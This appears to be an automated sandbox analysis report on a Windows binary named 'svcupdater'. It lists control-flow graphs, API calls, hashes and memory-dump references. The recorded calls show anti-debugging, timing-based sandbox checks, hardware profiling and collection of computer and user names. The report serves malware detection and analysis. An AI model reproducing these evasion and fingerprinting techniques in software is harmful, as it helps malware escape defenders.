be48f7-be48ff 1022->1026 1031 be5062 call bf9dff 1025->1031 1026->1004 1029 be4905-be49ec call be2a70 call be2760 call be2530 call be6190 1026->1029 1043 be49ee-be49fd 1029->1043 1044 be4a1d-be4a2a 1029->1044 1034 be5067-be508b call bf9dff 1031->1034 1045 be49ff-be4a0d 1043->1045 1046 be4a13-be4a1a call bf564d 1043->1046 1047 be4a2c-be4a3b 1044->1047 1048 be4a5b-be4a83 1044->1048 1045->1009 1045->1046 1046->1044 1052 be4a3d-be4a4b 1047->1052 1053 be4a51-be4a58 call bf564d 1047->1053 1049 be4ab4-be4ae0 1048->1049 1050 be4a85-be4a94 1048->1050 1057 be4ae3-be4ae8 1049->1057 1055 be4aaa-be4ab1 call bf564d 1050->1055 1056 be4a96-be4aa4 1050->1056 1052->1009 1052->1053 1053->1048 1055->1049 1056->1009 1056->1055 1057->1057 1061 be4aea-be4af0 1057->1061 1061->1017 1063 be4af6-be4bdd call be2a70 call be2760 call be2530 call be6190 1061->1063 1072 be4c0e-be4c1b 1063->1072 1073 be4bdf-be4bee 1063->1073 1076 be4c4c-be4c74 1072->1076 1077 be4c1d-be4c2c 1072->1077 1074 be4c04-be4c0b call bf564d 1073->1074 1075 be4bf0-be4bfe 1073->1075 1074->1072 1075->1025 1075->1074 1078 be4c76-be4c85 1076->1078 1079 be4ca5-be4cac call be4350 1076->1079 1081 be4c2e-be4c3c 1077->1081 1082 be4c42-be4c49 call bf564d 1077->1082 1083 be4c9b-be4ca2 call bf564d 1078->1083 1084 be4c87-be4c95 1078->1084 1092 be4cb2-be4ccf GetModuleFileNameA 1079->1092 1093 be4ff1-be4ffa 1079->1093 1081->1025 1081->1082 1082->1076 1083->1079 1084->1025 1084->1083 1094 be4cd0-be4cd5 1092->1094 1093->984 1095 be4ffc-be500b 1093->1095 1094->1094 1096 be4cd7-be4d41 call be85d0 GetComputerNameA GetUserNameA 1094->1096 1097 be501d-be5024 call bf564d 1095->1097 1098 be500d-be501b 1095->1098 1103 be4d44-be4d49 1096->1103 1097->984 1098->1034 1098->1097 1103->1103 1104 be4d4b-be4d8b call be2830 1103->1104 1107 be4d90-be4d95 1104->1107 1107->1107 1108 be4d97-be4e51 call be2830 call be2530 call be96c0 call be6190 1107->1108 1117 be4e82-be4e8f 1108->1117 1118 be4e53-be4e62 1108->1118 1119 be4ec0-be4ecd 1117->1119 1120 be4e91-be4ea0 1117->1120 1121 be4e78-be4e7f call bf564d 1118->1121 1122 be4e64-be4e72 1118->1122 1125 be4efe-be4f26 1119->1125 1126 be4ecf-be4ede 1119->1126 1123 be4eb6-be4ebd call bf564d 1120->1123 1124 be4ea2-be4eb0 1120->1124 1121->1117 1122->1031 1122->1121 1123->1119 1124->1031 1124->1123 1132 be4f28-be4f37 1125->1132 1133 be4f57-be4f89 1125->1133 1130 be4ef4-be4efb call bf564d 1126->1130 1131 be4ee0-be4eee 1126->1131 1130->1125 1131->1031 1131->1130 1138 be4f4d-be4f54 call bf564d 1132->1138 1139 be4f39-be4f47 1132->1139 1134 be4fec call bf3210 1133->1134 1135 be4f8b-be4f8e 1133->1135 1134->1093 1141 be4f90-be4f94 1135->1141 1142 be4fa1-be4fa4 1135->1142 1138->1133 1139->1031 1139->1138 1146 be4fa6-be4faa 1141->1146 1147 be4f96-be4f9f 1141->1147 1142->1146 1148 be4fda 1142->1148 1150 be4fac-be4faf 1146->1150 1151 be4fd3-be4fd8 1146->1151 1147->1141 1147->1142 1149 be4fdc-be4fde 1148->1149 1149->1134 1152 be4fe0-be4fe5 call be4050 call bea030 1149->1152 1150->1148 1153 be4fb1-be4fb7 1150->1153 1151->1149 1160 be4fea 1152->1160 1153->1151 1155 be4fb9-be4fbc 1153->1155 1155->1148 1157 be4fbe-be4fc4 1155->1157 1157->1151 1159 be4fc6-be4fc9 1157->1159 1159->1148 1161 be4fcb-be4fd1 1159->1161 1160->1093 1161->1148 1161->1151
                                                                                                    APIs
                                                                                                      • Part of subcall function 00BE3B60: GetSystemInfo.KERNELBASE(?), ref: 00BE3B7F
                                                                                                      • Part of subcall function 00BE3B60: GlobalMemoryStatusEx.KERNELBASE(?), ref: 00BE3BA0
                                                                                                      • Part of subcall function 00BE3B60: CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00BE3BF6
                                                                                                      • Part of subcall function 00BE3B60: DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00BE3C14
                                                                                                      • Part of subcall function 00BE3B60: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE3C47
                                                                                                      • Part of subcall function 00BE3F90: IsDebuggerPresent.KERNEL32(2F4C7F60,?,00000044), ref: 00BE3FBA
                                                                                                      • Part of subcall function 00BE3F90: GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00BE3FE7
                                                                                                      • Part of subcall function 00BE3F90: GetProcAddress.KERNEL32(00000000), ref: 00BE3FEE
                                                                                                      • Part of subcall function 00BE3F90: GetTickCount64.KERNEL32 ref: 00BE3FFA
                                                                                                      • Part of subcall function 00BE3F90: NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00BE4016
                                                                                                      • Part of subcall function 00BE3F90: GetTickCount64.KERNEL32 ref: 00BE4018
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,2F4C7F60), ref: 00BE4736
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00BE4CC0
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00BE4D03
                                                                                                    • GetUserNameA.ADVAPI32(?,000000FF), ref: 00BE4D17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Count64FileModuleTick$AddressComputerControlCreateDebuggerDelayDeviceExecutionFolderGlobalHandleInfoMemoryPathPresentProcStatusSystemUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                                                                    • String ID: 724471\\user$P$Win32Sync$svcupdater
                                                                                                    • API String ID: 3481597238-1650623006
                                                                                                    • Opcode ID: c4b72d3307c9bd84db379060f8e619632726ed3073bcf358432f94d05416832c
                                                                                                    • Instruction ID: 4528c65f44238279ee55ff88f66fc4d4d74971b3b49c7c8d513e104f612dd2f8
                                                                                                    • Opcode Fuzzy Hash: c4b72d3307c9bd84db379060f8e619632726ed3073bcf358432f94d05416832c
                                                                                                    • Instruction Fuzzy Hash: A84216B19001988BDB29CB28CC987EEB7B5AF51304F5482D8E24967683D7706FC9CF95
                                                                                                    Function 00BE3F90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59librarynativeloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1162 be3f90-be3fc2 IsDebuggerPresent 1163 be4029 1162->1163 1164 be3fc4-be3fcb call be3d10 1162->1164 1166 be402b-be4045 call bf53be 1163->1166 1164->1163 1169 be3fcd-be3fd4 call be3c80 1164->1169 1169->1163 1173 be3fd6-be3ff8 GetModuleHandleW GetProcAddress 1169->1173 1174 be3ffa-be4023 GetTickCount64 NtDelayExecution GetTickCount64 1173->1174 1175 be4025-be4027 1173->1175 1174->1163 1174->1175 1175->1166
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(2F4C7F60,?,00000044), ref: 00BE3FBA
                                                                                                      • Part of subcall function 00BE3F90: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,2F4C7F60), ref: 00BE3D42
                                                                                                      • Part of subcall function 00BE3F90: Process32FirstW.KERNEL32(00000000,?), ref: 00BE3D6B
                                                                                                      • Part of subcall function 00BE3F90: Process32NextW.KERNEL32(00000000,0000022C), ref: 00BE3D81
                                                                                                      • Part of subcall function 00BE3C80: CloseHandle.KERNELBASE(DEADBEEF,2F4C7F60), ref: 00BE3CBF
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00BE3FE7
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00BE3FEE
                                                                                                    • GetTickCount64.KERNEL32 ref: 00BE3FFA
                                                                                                    • NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00BE4016
                                                                                                    • GetTickCount64.KERNEL32 ref: 00BE4018
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Count64HandleProcess32Tick$AddressCloseCreateDebuggerDelayExecutionFirstModuleNextPresentProcSnapshotToolhelp32
                                                                                                    • String ID: NtDelayExecution$ntdll.dll
                                                                                                    • API String ID: 2350081285-521143355
                                                                                                    • Opcode ID: 22e69068800b542bbd0f71dfc411ff36097066820e44780964d24fa971513191
                                                                                                    • Instruction ID: 7aae243974b8d3d1ca0d7f29528926ebd444e92ff612357d598bed8bf94bbbf6
                                                                                                    • Opcode Fuzzy Hash: 22e69068800b542bbd0f71dfc411ff36097066820e44780964d24fa971513191
                                                                                                    • Instruction Fuzzy Hash: 1F110671A00789EFDB109FE5EC49BAE77F8FF49711F1009B9EA12D3282DB3485048694
                                                                                                    Function 00C104D7 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 911 c104d7-c10507 call c10225 914 c10522-c1052e call c0b512 911->914 915 c10509-c10514 call bfe7e0 911->915 921 c10530-c10545 call bfe7e0 call bfe7f3 914->921 922 c10547-c10590 call c10190 914->922 920 c10516-c1051d call bfe7f3 915->920 932 c107fc-c10800 920->932 921->920 930 c10592-c1059b 922->930 931 c105fd-c10606 GetFileType 922->931 934 c105d2-c105f8 GetLastError call bfe799 930->934 935 c1059d-c105a1 930->935 936 c10608-c10639 GetLastError call bfe799 CloseHandle 931->936 937 c1064f-c10652 931->937 934->920 935->934 941 c105a3-c105d0 call c10190 935->941 936->920 948 c1063f-c1064a call bfe7f3 936->948 939 c10654-c10659 937->939 940 c1065b-c10661 937->940 944 c10665-c106b3 call c0b45d 939->944 940->944 945 c10663 940->945 941->931 941->934 954 c106d2-c106fa call c0ff42 944->954 955 c106b5-c106c1 call c1039f 944->955 945->944 948->920 960 c106fc-c106fd 954->960 961 c106ff-c10740 954->961 955->954 962 c106c3 955->962 963 c106c5-c106cd call c03873 960->963 964 c10761-c1076f 961->964 965 c10742-c10746 961->965 962->963 963->932 968 c10775-c10779 964->968 969 c107fa 964->969 965->964 967 c10748-c1075c 965->967 967->964 968->969 971 c1077b-c107ae CloseHandle call c10190 968->971 969->932 974 c107b0-c107dc GetLastError call bfe799 call c0b625 971->974 975 c107e2-c107f6 971->975 974->975 975->969
                                                                                                    APIs
                                                                                                      • Part of subcall function 00C10190: CreateFileW.KERNELBASE(?,00000000,?,00C10580,?,?,00000000,?,00C10580,?,0000000C), ref: 00C101AD
                                                                                                    • GetLastError.KERNEL32 ref: 00C105EB
                                                                                                    • __dosmaperr.LIBCMT ref: 00C105F2
                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00C105FE
                                                                                                    • GetLastError.KERNEL32 ref: 00C10608
                                                                                                    • __dosmaperr.LIBCMT ref: 00C10611
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C10631
                                                                                                    • CloseHandle.KERNEL32(00C07BEE), ref: 00C1077E
                                                                                                    • GetLastError.KERNEL32 ref: 00C107B0
                                                                                                    • __dosmaperr.LIBCMT ref: 00C107B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: 4d92700db6a8b16064b43e21126af98907ed42bf4d3fbf26f3b0af5f243bebff
                                                                                                    • Instruction ID: 8a4ff302017e2c29605a4cbe3b4076a7283bfc9d506af973c1bd75fb73f60d52
                                                                                                    • Opcode Fuzzy Hash: 4d92700db6a8b16064b43e21126af98907ed42bf4d3fbf26f3b0af5f243bebff
                                                                                                    • Instruction Fuzzy Hash: DAA13532A101599FCF19AF68DC51BED3BA1AF47320F240189F821DB2E1C7749D92EB91
                                                                                                    Function 00BE3B60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1176 be3b60-be3b8d GetSystemInfo 1177 be3c64-be3c77 call bf53be 1176->1177 1178 be3b93-be3bb8 GlobalMemoryStatusEx 1176->1178 1178->1177 1180 be3bbe-be3bcb 1178->1180 1182 be3bd3-be3bde 1180->1182 1182->1182 1183 be3be0-be3c2a CreateFileA DeviceIoControl call bf5a20 1182->1183 1185 be3c2f-be3c63 call bf5a20 call c12ca0 call bf53be 1183->1185
                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 00BE3B7F
                                                                                                    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 00BE3BA0
                                                                                                    • CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00BE3BF6
                                                                                                    • DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00BE3C14
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE3C47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ControlCreateDeviceFileGlobalInfoMemoryStatusSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3398702251-2766056989
                                                                                                    • Opcode ID: f7ba6539da8738a3670119f154af3adc6167c9c634f8b2a199f9153167ed4cdd
                                                                                                    • Instruction ID: 7a12b9eefc5b4d5e4c6f7fe48c4374958000786b01527ab0e300a028ad4523c1
                                                                                                    • Opcode Fuzzy Hash: f7ba6539da8738a3670119f154af3adc6167c9c634f8b2a199f9153167ed4cdd
                                                                                                    • Instruction Fuzzy Hash: E2319570518344ABE720DB74CC4AFAFB7E8AF89704F50494CF789A6191DB74A148C756
                                                                                                    Function 00BE4350 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 240COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1192 be4350-be4452 call bf6f20 call be84a0 call be7570 1199 be4454-be4459 call bf47ac 1192->1199 1200 be44c5-be44e9 call be3a20 1192->1200 1203 be445e-be4463 1199->1203 1204 be44ee-be44fc 1200->1204 1203->1200 1205 be4465-be44ae call be7370 call be8930 call be7210 1203->1205 1206 be44fe-be4505 1204->1206 1207 be450a-be456a call be8890 call bfd2c0 OpenProcess 1204->1207 1205->1204 1234 be44b0-be44b9 1205->1234 1209 be45aa-be463c call be5bb0 call bf464d call bf53be 1206->1209 1219 be456c-be4578 1207->1219 1220 be4598-be45a6 1207->1220 1223 be458e-be4595 call bf564d 1219->1223 1224 be457a-be4588 1219->1224 1220->1209 1223->1220 1224->1223 1227 be463d-be46d9 call bf9dff call be5bb0 call bf464d 1224->1227 1234->1204 1240 be44bb-be44c3 1234->1240 1240->1204
                                                                                                    APIs
                                                                                                      • Part of subcall function 00BE84A0: std::locale::_Init.LIBCPMT ref: 00BE8532
                                                                                                      • Part of subcall function 00BE7570: std::locale::_Init.LIBCPMT ref: 00BE75C2
                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,2F4C7F60), ref: 00BE4551
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00BE4615
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00BE46C1
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::_Lockit.LIBCPMT ref: 00BE8966
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::_Lockit.LIBCPMT ref: 00BE8988
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89A8
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$OpenProcess
                                                                                                    • String ID: X
                                                                                                    • API String ID: 2479089509-3081909835
                                                                                                    • Opcode ID: a11da64449611ebe4e544a78d4b8e5dfa4e5347565735658c2744fd195c1ff23
                                                                                                    • Instruction ID: 2eca45fc5047825254425a888738d19d46d0dbee53c4159e177a22fd2a962b44
                                                                                                    • Opcode Fuzzy Hash: a11da64449611ebe4e544a78d4b8e5dfa4e5347565735658c2744fd195c1ff23
                                                                                                    • Instruction Fuzzy Hash: 9BA13C74900299DFDB20CF64C949BADBBF4FF04304F2485E9E509A7691DB74AA85CF50
                                                                                                    Function 00BE4050 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1243 be4050-be4144 call bf6f20 call be84a0 call be7570 1250 be4146-be414b call bf47ac 1243->1250 1251 be41b5-be41d9 call be3a20 1243->1251 1254 be4150-be4155 1250->1254 1255 be41de-be4204 GetCurrentProcessId call be5f10 call be7480 1251->1255 1254->1251 1256 be4157-be41a0 call be7370 call be8930 call be7210 1254->1256 1264 be422f-be42bb call be5bb0 call bf464d call bf53be 1255->1264 1265 be4206-be422a call be3a20 1255->1265 1256->1255 1276 be41a2-be41a9 1256->1276 1265->1264 1276->1255 1279 be41ab-be41b3 1276->1279 1279->1255
                                                                                                    APIs
                                                                                                      • Part of subcall function 00BE84A0: std::locale::_Init.LIBCPMT ref: 00BE8532
                                                                                                      • Part of subcall function 00BE7570: std::locale::_Init.LIBCPMT ref: 00BE75C2
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,2F4C7F60), ref: 00BE41E5
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00BE429A
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::_Lockit.LIBCPMT ref: 00BE8966
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::_Lockit.LIBCPMT ref: 00BE8988
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89A8
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$InitLockit::_Lockit::~_std::locale::_$CurrentIos_base_dtorProcessstd::ios_base::_
                                                                                                    • String ID: `
                                                                                                    • API String ID: 1043075861-2679148245
                                                                                                    • Opcode ID: 4f68c1237f8ee1bf6de48483f5691781d18f4251cf39e1a05a9e276a7c60d434
                                                                                                    • Instruction ID: 1b4b6cdfa96e121f55ae3df48d4651278e72ce0e773961cac9319ddba37b83b3
                                                                                                    • Opcode Fuzzy Hash: 4f68c1237f8ee1bf6de48483f5691781d18f4251cf39e1a05a9e276a7c60d434
                                                                                                    • Instruction Fuzzy Hash: C361E5B4901258DFEB10DF64D889F9ABBF4FB14304F1441E9E909AB291DB719A88CF40
                                                                                                    Function 00C03505 Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1331 c03505-c03524 1332 c0352a-c0352c 1331->1332 1333 c036fe 1331->1333 1335 c03558-c0357e 1332->1335 1336 c0352e-c0354d call bf9d72 1332->1336 1334 c03700-c03704 1333->1334 1337 c03580-c03582 1335->1337 1338 c03584-c0358a 1335->1338 1342 c03550-c03553 1336->1342 1337->1338 1340 c0358c-c03596 1337->1340 1338->1336 1338->1340 1343 c035a6-c035b1 call c03052 1340->1343 1344 c03598-c035a3 call c07253 1340->1344 1342->1334 1349 c035f3-c03605 1343->1349 1350 c035b3-c035b8 1343->1350 1344->1343 1351 c03656-c03676 WriteFile 1349->1351 1352 c03607-c0360d 1349->1352 1353 c035ba-c035be 1350->1353 1354 c035dd-c035f1 call c02c18 1350->1354 1355 c03681 1351->1355 1356 c03678-c0367e GetLastError 1351->1356 1358 c03644-c0364f call c030d0 1352->1358 1359 c0360f-c03612 1352->1359 1360 c035c4-c035d3 call c02fea 1353->1360 1361 c036c6-c036d8 1353->1361 1371 c035d6-c035d8 1354->1371 1363 c03684-c0368f 1355->1363 1356->1355 1370 c03654 1358->1370 1364 c03632-c03642 call c03294 1359->1364 1365 c03614-c03617 1359->1365 1360->1371 1366 c036e2-c036f4 1361->1366 1367 c036da-c036e0 1361->1367 1372 c03691-c03696 1363->1372 1373 c036f9-c036fc 1363->1373 1377 c0362d-c03630 1364->1377 1365->1361 1374 c0361d-c03628 call c031ab 1365->1374 1366->1342 1367->1333 1367->1366 1370->1377 1371->1363 1378 c036c4 1372->1378 1379 c03698-c0369d 1372->1379 1373->1334 1374->1377 1377->1371 1378->1361 1382 c036b6-c036bf call bfe7bc 1379->1382 1383 c0369f-c036b1 1379->1383 1382->1342 1383->1342
                                                                                                    APIs
                                                                                                      • Part of subcall function 00C02C18: GetConsoleOutputCP.KERNEL32(2F4C7F60,00000000,00000000,00000000), ref: 00C02C7B
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,00C24240,00000000,0000000C,00000000,00000000,?,00000000,00C24240,00000010,00BFC6A2,00000000,00000000,00000000), ref: 00C0366E
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00C03678
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 2915228174-0
                                                                                                    • Opcode ID: e7c0febf03c2cd5eb69acd5fc00d3290a3cb9b31093ab1df7095c6776ce772db
                                                                                                    • Instruction ID: 3ab787a5bff77ec8a5db79b4580b9822b47680899be8d692bf73092b8fa3c8cc
                                                                                                    • Opcode Fuzzy Hash: e7c0febf03c2cd5eb69acd5fc00d3290a3cb9b31093ab1df7095c6776ce772db
                                                                                                    • Instruction Fuzzy Hash: 3E618CB1D04189AEDF118FA9CC85AEEBBBDAF09304F144199F914A7292D732DB05DB60
                                                                                                    Function 00C030D0 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1386 c030d0-c03125 call bf5ff0 1389 c03127 1386->1389 1390 c0319a-c031aa call bf53be 1386->1390 1392 c0312d 1389->1392 1394 c03133-c03135 1392->1394 1395 c03137-c0313c 1394->1395 1396 c0314f-c03174 WriteFile 1394->1396 1397 c03145-c0314d 1395->1397 1398 c0313e-c03144 1395->1398 1399 c03192-c03198 GetLastError 1396->1399 1400 c03176-c03181 1396->1400 1397->1394 1397->1396 1398->1397 1399->1390 1400->1390 1401 c03183-c0318e 1400->1401 1401->1392 1402 c03190 1401->1402 1402->1390
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00C03654,00000000,00000000,00000000,?,0000000C,00000000), ref: 00C0316C
                                                                                                    • GetLastError.KERNEL32(?,00C03654,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00C24240,00000010,00BFC6A2,00000000,00000000), ref: 00C03192
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
